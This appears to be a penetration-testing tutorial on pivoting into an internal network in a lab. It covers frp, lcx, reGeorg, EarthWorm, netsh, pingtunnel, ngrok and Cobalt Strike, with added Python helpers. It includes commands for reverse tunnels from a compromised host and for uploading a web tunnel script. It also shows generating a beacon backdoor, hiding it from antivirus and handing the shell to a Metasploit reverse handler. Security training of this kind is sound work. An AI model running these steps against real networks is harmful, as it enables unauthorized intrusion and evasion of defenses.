- Preamble
- Environment setup
- List of tools
- Tool use
  - Frp: command execution, test
  - Lcx: command execution, test
  - reGeorg: command execution, test, Proxifier
  - ew (EarthWorm): forward proxy (command execution, test), reverse proxy (command execution, test), SocksCap
  - netsh: command execution
  - pingtunnel: command execution, test
  - ngrok: command execution and experiment
  - cs: command execution, test
preamble
This article introduces some of the tunneling and proxy-forwarding tools I commonly use during intranet penetration testing.
Environment Setup
Environment configuration pitfall: remember to clear the checkbox (the √ in the screenshot) on the intranet NIC, otherwise a host on a different network segment can reach the intranet directly and there is nothing left to pivot through...
win10_hacker: 192.168.29.139
kali_hacker: 192.168.29.128
windows (target server): (192.168.29.130, 10.0.0.3)
winserver2003: 10.0.0.112
Note: it does not matter which dual-NIC system you use. I use Windows here because, of the target images I tried, only the Win10 one on hand would run; you can just as well use Linux as the controlled machine. Just make sure to use the frp build for the matching operating system.
List of tools
Forwarding tools: these run on the compromised host and forward intranet traffic out to the attacker's network
Frp
Lcx
reGeorg
ew(EarthWorm)
netsh
pingtunnel
ngrok
cs
Proxy tools: these run locally on the attacker's machine and push application traffic (browser, RDP client, ...) into the forwarded SOCKS tunnel
Proxifier(windows)
SocksCap(windows)
cs(windows)
Proxychains(linux)#not introduced in this article
Tool Use
Note: the following gives only a brief description of how each tool is used.
Frp
Project address: /fatedier/frp/
Server (frps): kali_hacker (192.168.29.128)
Client (frpc): windows (target server): (192.168.29.130, 10.0.0.3)
Goal: forward the services of 10.0.0.112 on the client's intranet (80, 3389 and 22 in the config below) out to the server, e.g. 10.0.0.112:3389 onto the server's port 6000.
command execution
kali_hacker
vim frps.toml    # edit the server config; pick a bindPort that does not conflict with a port already in use on kali
# Run the server
./frps -c ./frps.toml
windows
# Configuration file fields (frpc.toml)
serverAddr: address of the frps server.
serverPort: the port frps listens on (bindPort in the server's configuration file).
localIP: the intranet ip whose service you want to forward.
localPort: the port on localIP whose traffic is forwarded out.
remotePort: the port on the server where the forwarded traffic becomes reachable (tcp/udp proxies).
type: the kind of traffic to forward, usually tcp or http (http is covered below).
customDomains: the domain name under which the forwarded http service is reached on the server; you then need a hosts entry binding that name to the server's ip.
# Run the client
.\frpc.exe -c .\frpc.toml
Here is the common configuration: one http proxy plus tcp proxies (rdp, ssh)
# frpc.toml
serverAddr = "192.168.29.128"
serverPort = 7000

[[proxies]]
name = "web"
type = "http"            # frps must have vhostHTTPPort set for http proxies to be served
localIP = "10.0.0.112"
localPort = 80
customDomains = [""]     # the domain you bind in the hosts file on the server

[[proxies]]
name = "rdp"
type = "tcp"
localIP = "10.0.0.112"
localPort = 3389
remotePort = 6000

[[proxies]]
name = "ssh"
type = "tcp"
localIP = "10.0.0.112"
localPort = 22
remotePort = 6001        # must differ from rdp's 6000: two tcp proxies cannot share a remotePort on the server
test
Server side
Edit the hosts file on kali: bind the domain set in customDomains on the client to the server ip
(the ip is this kali machine itself, so 127.0.0.1 works)
Client side
Run frpc on the windows target.
Access the intranet from the server
Visiting the custom domain on kali reaches the intranet web site; in the same way, port 6000 on kali is the 3389 traffic of intranet machine 10.0.0.112.
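Two of the fields above bite in practice: the config as originally published listed remotePort 6000 for both the rdp and the ssh proxy, which frps refuses for the second one, and an http proxy whose customDomains list is empty has nothing to route on. The checker below is an added example for this article, not code from the frp project; it reads an frpc TOML config with Python's standard tomllib (3.11+, or the tomli backport) and reports those mistakes before you push the file to a pivot host. The embedded config is a constructed copy of the article's own, with the duplicate port left in so the check has something to find.

```python
"""Sanity-check an frpc TOML config before deploying it on a pivot host.

Added example for this article, not part of the frp project. It catches the
mistakes that cost time in the field: two proxies claiming the same server
remotePort, an http proxy with no domain to route on, a remotePort colliding
with the server's bind port, and ports outside 1-65535.
"""
try:
    import tomllib  # Python 3.11+
except ModuleNotFoundError:  # pragma: no cover
    import tomli as tomllib  # pip install tomli on older interpreters

# Constructed sample: the article's frpc config as originally published,
# including its bug (rdp and ssh both ask the server for remotePort 6000).
SAMPLE_FRPC = """
serverAddr = "192.168.29.128"
serverPort = 7000

[[proxies]]
name = "web"
type = "http"
localIP = "10.0.0.112"
localPort = 80
customDomains = [""]

[[proxies]]
name = "rdp"
type = "tcp"
localIP = "10.0.0.112"
localPort = 3389
remotePort = 6000

[[proxies]]
name = "ssh"
type = "tcp"
localIP = "10.0.0.112"
localPort = 22
remotePort = 6000
"""


def _valid_port(value) -> bool:
    return isinstance(value, int) and 1 <= value <= 65535


def check_frpc(text: str) -> list[str]:
    """Return human-readable problems; an empty list means the config looks sane."""
    cfg = tomllib.loads(text)
    problems = []
    seen_remote = {}  # (type, remotePort) -> name of the proxy that claimed it first
    for p in cfg.get("proxies", []):
        name = p.get("name", "<unnamed>")
        ptype = p.get("type", "tcp")  # frp's default proxy type
        if not _valid_port(p.get("localPort")):
            problems.append(f"{name}: localPort {p.get('localPort')!r} is not a valid port")
        if ptype in ("tcp", "udp"):
            rport = p.get("remotePort")
            if not _valid_port(rport):
                problems.append(f"{name}: remotePort {rport!r} is not a valid port")
            elif rport == cfg.get("serverPort"):
                problems.append(f"{name}: remotePort {rport} collides with serverPort")
            elif (ptype, rport) in seen_remote:
                problems.append(f"{name}: remotePort {rport} already used by {seen_remote[(ptype, rport)]}")
            else:
                seen_remote[(ptype, rport)] = name
        elif ptype in ("http", "https"):
            domains = [d for d in p.get("customDomains", []) if d]
            if not domains and not p.get("subdomain"):
                problems.append(f"{name}: http proxy needs a non-empty customDomains entry or a subdomain")
    return problems


if __name__ == "__main__":
    for line in check_frpc(SAMPLE_FRPC) or ["no problems found"]:
        print(line)
```

Run it against the file you are about to copy to the client; fix every line it prints, then start frpc. The same check on the corrected config (ssh on 6001, a real domain on the web proxy) returns nothing.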
Lcx
Project address:
/Brucetg/Pentest-tools/tree/master/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91
windows_hacker: (192.168.29.139)
windows (target server): (192.168.29.130, 10.0.0.3)
Goal: relay 10.0.0.112:3389 from the windows target's intranet to port 2222 on windows_hacker, where lcx joins it to local port 4444; the operator then connects to windows_hacker:4444.
command execution
windows_hacker
.\lcx.exe -listen 2222 4444    # wait for the slave on 2222 and hand its stream to whatever connects on 4444
windows
.\lcx.exe -slave 192.168.29.139 2222 10.0.0.112 3389    # dial out to the hacker's 2222 and to the intranet RDP port, splice them
test
Run the listener on windows_hacker first
Then run the slave on the controlled windows host
Remote desktop from windows_hacker to 127.0.0.1:4444 reaches the intranet machine
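The listen/slave pair is easy to misread as "port 2222 is forwarded to 4444". What actually happens is that lcx on windows_hacker accepts two inbound TCP connections, one from the slave and one from the operator's RDP client, and splices them; the slave, for its part, splices its outbound connection to the listener with its own connection to 10.0.0.112:3389. The Python re-implementation below is an added example for this article, not lcx's code; it reproduces that mechanism with the listener, the slave, a constructed echo service standing in for the intranet target and the operator all on the loopback interface with ephemeral ports, so it runs offline.

```python
"""Minimal re-implementation of the lcx -listen / -slave pivot.

Added example for this article, not lcx's own code. The 'listen' side (the
hacker box) waits for two inbound connections, one from the slave and one
from the operator, and splices them; the 'slave' side (the compromised host)
dials out to the listener and to the internal target and splices those. The
operator never talks to 10.0.0.x directly. Everything runs on 127.0.0.1 with
ephemeral ports; the 'intranet target' is a constructed echo server.
"""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until EOF, then half-close dst so the EOF propagates."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def bridge(a: socket.socket, b: socket.socket) -> None:
    """Full-duplex splice of two connected sockets; returns once both directions hit EOF."""
    t = threading.Thread(target=_pump, args=(a, b), daemon=True)
    t.start()
    _pump(b, a)
    t.join()
    a.close()
    b.close()


def listen_side(slave_ls: socket.socket, operator_ls: socket.socket) -> None:
    """lcx -listen <slave_port> <operator_port>: join the slave's and the operator's connections."""
    slave_conn, _ = slave_ls.accept()        # the compromised host dials in first
    operator_conn, _ = operator_ls.accept()  # then the operator's client (RDP, etc.)
    bridge(slave_conn, operator_conn)


def slave_side(listener_addr: tuple, target_addr: tuple) -> None:
    """lcx -slave <listener_ip> <port> <target_ip> <port>: dial both ends and splice."""
    to_listener = socket.create_connection(listener_addr)
    to_target = socket.create_connection(target_addr)
    bridge(to_listener, to_target)


def _echo_once(ls: socket.socket) -> None:
    """Stand-in for the intranet service (constructed): echo one connection, then exit."""
    conn, _ = ls.accept()
    with conn:
        while data := conn.recv(4096):
            conn.sendall(data)


def _listener() -> socket.socket:
    s = socket.socket()
    s.bind(("127.0.0.1", 0))  # ephemeral port, read back with getsockname()
    s.listen(1)
    return s


def demo(payload: bytes = b"hello through the pivot") -> bytes:
    """Run listener, slave, target and operator on loopback; return what the operator gets back."""
    target_ls, slave_ls, operator_ls = _listener(), _listener(), _listener()
    port = lambda s: s.getsockname()[1]
    workers = [
        threading.Thread(target=_echo_once, args=(target_ls,), daemon=True),
        threading.Thread(target=listen_side, args=(slave_ls, operator_ls), daemon=True),
        threading.Thread(target=slave_side,
                         args=(("127.0.0.1", port(slave_ls)), ("127.0.0.1", port(target_ls))),
                         daemon=True),
    ]
    for w in workers:
        w.start()
    # The operator only ever connects to the hacker box's second port.
    with socket.create_connection(("127.0.0.1", port(operator_ls))) as operator:
        operator.sendall(payload)
        operator.shutdown(socket.SHUT_WR)
        received = b""
        while chunk := operator.recv(4096):
            received += chunk
    for w in workers:
        w.join(timeout=5)
    for ls in (target_ls, slave_ls, operator_ls):
        ls.close()
    return received


if __name__ == "__main__":
    print(demo())
```

The ordering in the test section follows from this: the listener must be up before the slave dials out, and the slave must be connected before the operator's client gets anything, because the listener only accepts the operator after it has the slave's connection in hand.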
reGeorg
Project Address:
/sensepost/reGeorg
windows_hacker:(192.168.29.139)
windows (target server): (192.168.29.130, 10.0.0.3)
Goal: use the reGeorg tunnel script on the windows target to expose its intranet as a SOCKS proxy on port 9999 of windows_hacker.
command execution
windows
Upload the tunnel script matching the site's language (tunnel.php, tunnel.aspx, tunnel.jsp, ...) to the target web server and check that its URL loads.
(If the site is PHP, upload the php script, i.e. tunnel.php)
windows_hacker
Requires python2
python2 reGeorgSocksProxy.py -p 9999 -u http://192.168.29.130/tunnel.php
test
After uploading the script to the target server, it is enough that the hacker machine can fetch its URL successfully
Run reGeorgSocksProxy.py in the python2 environment; it then listens on 127.0.0.1:9999 as a SOCKS proxy
Proxifier
The tunnel is up; what remains is converting the exposed SOCKS endpoint into something local programs can use, because the intranet web site has to be reached as plain http traffic through it.
Using Proxifier to do the local traffic conversion:
1. Add a proxy server
2. Add a proxy rule
3. Select the proxy server configured earlier, 127.0.0.1:9999
Then open your browser and visit the intranet ip. This effectively brings the whole intranet onto your own machine rather than exposing one port at a time, so browsing the intranet and capturing packets with Burp are no problem.
4. Successful access
ew(EarthWorm)
Project address: the tool has been taken down, sadly, so there is no link to give.
(This tool is basically caught by every antivirus; the detection rules are public.)
windows_hacker: (192.168.29.139)
windows (target server): (192.168.29.130, 10.0.0.3)
(ew below stands for the EarthWorm binary for your platform)
Forward proxy
command execution
windows_hacker: point Proxifier at the ip:port of the SOCKS server started on the target (192.168.29.130:1080)
windows: ew -s ssocksd -l 1080
test
On the target server windows, ew starts a SOCKS5 server listening on 1080; this is the port the forward connection from windows_hacker goes to. Forward mode only works when the attacker can reach that port directly; if a firewall blocks it, use the reverse mode below.
windows_hacker: configure the target ip + port in Proxifier and you can access the intranet. This tool is very fast!
Reverse proxy
command execution
windows (target server): ew -s rssocks -d 192.168.29.139 -e 888
windows_hacker: ew -s rcsocks -l 1080 -e 888
Meaning: the target server dials out to the hacker's port 888 and offers its intranet as a SOCKS service over that connection; the hacker box then exposes that SOCKS service locally on port 1080.
test
Start rcsocks on the hacker machine first, otherwise the target side errors out because it has nothing to connect to.
Then run the rssocks command above on the target server.
You will see a message on the hacker side confirming the link is up.
SocksCap
We have used Proxifier a lot above, so let's use SocksCap here.
1. Click Proxy, then right-click to add a new proxy (127.0.0.1:1080)
2. Import a program: choose the program whose traffic should go through the proxy. Since we want the intranet web service, choose the browser.
3. After importing, launch it from SocksCap and you can open the intranet site
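Every tool in this section hands the intranet to Proxifier or SocksCap as a SOCKS5 endpoint (reGeorg on 9999, ew on 1080), and what those two programs do on the browser's behalf is speak RFC 1928: greet, agree on "no authentication", send a CONNECT for the intranet host:port, read a one-byte status, then pass raw bytes. The codec below is an added example for this article, not code from any of these tools; it builds and parses both sides of that exchange, with the intranet addresses as constructed sample values, so you can see what crosses the tunnel and why a domain-name CONNECT (ATYP 3) is what makes intranet hostnames resolve on the far side instead of on your own machine.

```python
"""SOCKS5 CONNECT exchange, encoded and decoded in pure Python (RFC 1928).

Added example for this article, not code from reGeorg, EarthWorm, Proxifier
or SocksCap. Client-side functions build what Proxifier/SocksCap send to the
local proxy port; proxy-side functions decode it the way ew/reGeorg must.
"""
import ipaddress
import socket
import struct

VERSION = 5
NO_AUTH = 0x00
NO_ACCEPTABLE = 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {0: "succeeded", 1: "general failure", 2: "not allowed by ruleset",
              3: "network unreachable", 4: "host unreachable", 5: "connection refused",
              6: "TTL expired", 7: "command not supported", 8: "address type not supported"}


def client_greeting() -> bytes:
    """Client: VER=5, one method offered: no authentication."""
    return bytes([VERSION, 1, NO_AUTH])


def server_choice(greeting: bytes) -> bytes:
    """Proxy: accept no-auth if offered, else 0xFF (client must then close)."""
    ver, nmethods = greeting[0], greeting[1]
    if ver != VERSION:
        raise ValueError("not SOCKS5")
    methods = greeting[2:2 + nmethods]
    return bytes([VERSION, NO_AUTH if NO_AUTH in methods else NO_ACCEPTABLE])


def connect_request(host: str, port: int) -> bytes:
    """Client: CONNECT host:port. A name is sent as ATYP=3 so the proxy side
    resolves it inside the intranet (Proxifier's 'resolve hostnames through proxy')."""
    try:
        ip = ipaddress.ip_address(host)
        atyp, addr = (ATYP_IPV4 if ip.version == 4 else ATYP_IPV6), ip.packed
    except ValueError:
        raw = host.encode("idna")
        if len(raw) > 255:
            raise ValueError("hostname too long for SOCKS5")
        atyp, addr = ATYP_DOMAIN, bytes([len(raw)]) + raw
    return bytes([VERSION, CMD_CONNECT, 0x00, atyp]) + addr + struct.pack("!H", port)


def parse_request(data: bytes) -> tuple:
    """Proxy: decode a CONNECT request into (host, port); reject anything else."""
    ver, cmd, _rsv, atyp = data[:4]
    if ver != VERSION:
        raise ValueError("not SOCKS5")
    if cmd != CMD_CONNECT:
        raise ValueError(f"unsupported command {cmd}")
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntop(socket.AF_INET, data[4:8]), data[8:]
    elif atyp == ATYP_IPV6:
        host, rest = socket.inet_ntop(socket.AF_INET6, data[4:20]), data[20:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        host, rest = data[5:5 + n].decode("idna"), data[5 + n:]
    else:
        raise ValueError(f"unknown address type {atyp}")
    if len(rest) != 2:
        raise ValueError("truncated request or trailing bytes")
    return host, struct.unpack("!H", rest)[0]


def reply(status: int, bind_host: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    """Proxy: status 0 means a TCP session to the target exists; raw bytes flow after this."""
    return (bytes([VERSION, status, 0x00, ATYP_IPV4])
            + socket.inet_aton(bind_host) + struct.pack("!H", bind_port))


def parse_reply(data: bytes) -> str:
    """Client: turn the proxy's status byte into the text you see in Proxifier's log."""
    if data[0] != VERSION:
        raise ValueError("not SOCKS5")
    return REPLY_TEXT.get(data[1], f"unknown status {data[1]}")


if __name__ == "__main__":
    # Constructed walk-through: the browser asking for an intranet RDP host by ip and a web host by name.
    for target in (("10.0.0.112", 3389), ("oa.intranet.local", 80)):
        req = connect_request(*target)
        print(target, "->", req.hex(), "->", parse_request(req), parse_reply(reply(0)))
```

If you ever wonder whether a tool is "really SOCKS5" or only SOCKS4, the first byte of the greeting settles it: 0x05 here, 0x04 for SOCKS4, which has no method negotiation at all.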
netsh
Doing port forwarding on the target server itself with netsh is recommended; personally I think local port forwarding works best. It needs an administrator shell and the IP Helper (iphlpsvc) service, and the listen port must be allowed through the Windows firewall.
command execution
Target server: forward 10.0.0.112:80 from the intranet to local port 880, preferably binding the machine's externally reachable ip.
netsh interface portproxy add v4tov4 listenaddress=192.168.29.130 listenport=880 connectaddress=10.0.0.112 connectport=80
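portproxy rules survive reboots (they are stored under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp), so both the operator cleaning up and a defender auditing the host will want to list them and know the exact command that removes each one. The parser below is an added example for this article, not part of netsh; it reads the text that `netsh interface portproxy show all` prints (the sample embedded here is constructed to match the rule added above plus one loopback-only entry), flags rules that listen on a routable interface and forward to a different host, and builds the matching `netsh ... delete` command.

```python
"""Parse `netsh interface portproxy show all` and spot pivot-style forwards.

Added example for this article, not part of netsh. The sample output below is
constructed to match the rule added in this section plus one harmless local rule.
"""
import ipaddress
import re

SAMPLE_SHOW_ALL = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.29.130  880         10.0.0.112      80
127.0.0.1       3390        127.0.0.1       3389
"""

SECTION = re.compile(r"^Listen on (ipv[46]):\s+Connect to (ipv[46]):$")
ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(text: str) -> list:
    """Return one dict per rule: kind (v4tov4, v4tov6, ...), listen/connect address and port."""
    rules, kind = [], "v4tov4"
    for raw in text.splitlines():
        line = raw.strip()
        sec = SECTION.match(line)
        if sec:
            kind = f"{sec.group(1)[2:]}to{sec.group(2)[2:]}"  # "ipv4" -> "v4"
            continue
        row = ROW.match(line)
        if row:  # the header and the dashed line never have digits in columns 2 and 4
            rules.append({
                "kind": kind,
                "listen_addr": row.group(1), "listen_port": int(row.group(2)),
                "connect_addr": row.group(3), "connect_port": int(row.group(4)),
            })
    return rules


def _is_loopback(addr: str) -> bool:
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:  # a hostname rather than an ip literal
        return addr.lower() == "localhost"


def is_pivot(rule: dict) -> bool:
    """True when the host accepts on a routable interface and forwards to another machine."""
    return (not _is_loopback(rule["listen_addr"])
            and not _is_loopback(rule["connect_addr"])
            and rule["connect_addr"] != rule["listen_addr"])


def delete_command(rule: dict) -> str:
    """The netsh command that removes this rule (a rule is identified by its listen side only)."""
    return (f"netsh interface portproxy delete {rule['kind']} "
            f"listenaddress={rule['listen_addr']} listenport={rule['listen_port']}")


if __name__ == "__main__":
    for r in parse_portproxy(SAMPLE_SHOW_ALL):
        tag = "PIVOT" if is_pivot(r) else "local"
        print(f"[{tag}] {r['listen_addr']}:{r['listen_port']} -> {r['connect_addr']}:{r['connect_port']}")
        print("        cleanup:", delete_command(r))
```

On a real host, feed it the output of `netsh interface portproxy show all` (run from an elevated prompt) instead of the sample; `netsh interface portproxy reset` wipes every rule at once if you would rather not delete them one by one.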
pingtunnel
Here the experiment with windows as the destination routing server forwarding intranet traffic failed, so linux was used instead.
(If anyone has made it work, leave me a message so I can see what went wrong and learn~)
command execution
The example forwards port 3389 out; other ports work the same way. Server and client take the same parameters on either operating system. The only difference is that when I ran the server on windows it never received the client's requests; the dependencies were installed and I did not find the specific reason, so only linux is used for the server side here. Note that pingtunnel needs root/administrator rights on both ends, since it opens raw ICMP sockets.
(If any of you have succeeded, leave a message and let me know~)
server
./pingtunnel -type server
client
socks type: ./pingtunnel -type client -l :4455 -s <server ip> -sock5 1
tcp type: ./pingtunnel -type client -l :4455 -s <server ip> -t <intranet ip>:<port> -tcp 1
udp type: ./pingtunnel -type client -l :4455 -s <server ip> -t <intranet ip>:<port>
The client flags are:
- -type: client means this instance runs as the client.
- -l: the local listen address. If you omit the ip in front of the colon, it was only reachable via the loopback address in my test, so you connect to 127.0.0.1:4455; if you give the client's own ip, connect to that ip instead.
  (It should also be possible to forward to another ip for further use; I did not try it, anyone who succeeds can teach me in the comments.)
- -s: the server's domain name or ip.
- -t: the ip of a machine on the server's intranet and the port whose traffic is to be forwarded out.
test
The experiment forwards tcp traffic out; for socks, pair it with another tool to do the conversion (proxychains on linux, Proxifier or similar on windows, case by case).
server side
client
The 3389 traffic of server2003 on the intranet is forwarded successfully
ngrok
ngrok solves the problem of LAN hosts not being reachable the way a public-network host is: the intranet machine only needs outbound internet access. Think of your home LAN, which nobody outside can reach; if you run a service there and want it reachable from elsewhere without buying a public ip, ngrok is a good choice.
In intranet penetration it serves the same purpose: reaching a machine whose traffic cannot be accessed directly.
Here a machine is picked at random; it must be able to reach the internet, while the internet cannot reach it directly.
windows: 192.168.29.130
Command execution && experiment
1. First register an account on the official ngrok website.
2. After logging in, download the ngrok build for the target's operating system onto the target machine and register the authtoken from your dashboard (ngrok config add-authtoken <token>).
3. Run the ngrok program as follows
Running screenshot
I'm mapping port 80 out here
Run ngrok http 80; if you don't see the green status line saying the tunnel came up, run it again, as the first attempt doesn't always succeed. Once it works you will see the mapped URL as shown below; just visit that directly.
After visiting the URL it may look like the following picture
Click visit and you see the site you mapped out; if you mapped other traffic, connect to that address with the matching client instead.
Below you can see I have successfully accessed the site set up in the intranet
ps: I tried mapping port 3389 out for a remote desktop link and it failed; I didn't find the specific reason, but from testing it seems only mapped http sites work well, so for other traffic look for another tool. (ngrok does have an ngrok tcp mode; whether it is available to you depends on your account's plan and verification requirements.)
cs
This one is simple: drop the beacon payload on the target server and the shell comes back. For intranet penetration the best results come from handing the session that comes online in cs over to msf for the post-exploitation work.
command execution
Note in advance: I use linux for the server and windows for the client; you can choose your own combination, since both server and client are provided for both systems. This is the pairing I use most.
server side
Install a jdk, jdk8 is recommended (look up the installation method)
./teamserver <server ip> <connection password>
client
Install a jdk, jdk8 is recommended (look up the installation method)
./cobaltstrike    # the client launch script
ps: teamserver is also available for windows, as is the cs client.
test
server side
client
On windows just double-click the file
1. Then generate a beacon payload on the client side
First create a listener
If you don't need any other proxies, configure it as follows (look up further usage)
Choose to generate a beacon backdoor executable
Save the payload in a directory excluded from antivirus so it doesn't get deleted.
2. Transfer the payload to the target server and execute it; for this experiment I just double-click it in the virtual machine
Going back to the cs client shows a host online, and you can even see its two NICs, the internal and external ip
3. The best intranet penetration results come from cs working together with msf, so here I let cs pass a session to msf
First run msfconsole
Open msf and create the handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.29.128    # ip msf listens on
set lport 4444              # port msf listens on
exploit -j                  # start the handler in the background
4. Then add a listener in cs (type Foreign HTTP, host and port matching the msf handler)
5. Right-click the host and add a session (Spawn)
Then just select the msf listener you just added.
msf has got the shell; what follows depends on how well you play msf, and it's done.
This article introduced some tunnel/proxy tools for reaching an intranet; once the intranet environment is reachable, the post-exploitation work can proceed
(subject to cybersecurity laws and with authorization, of course)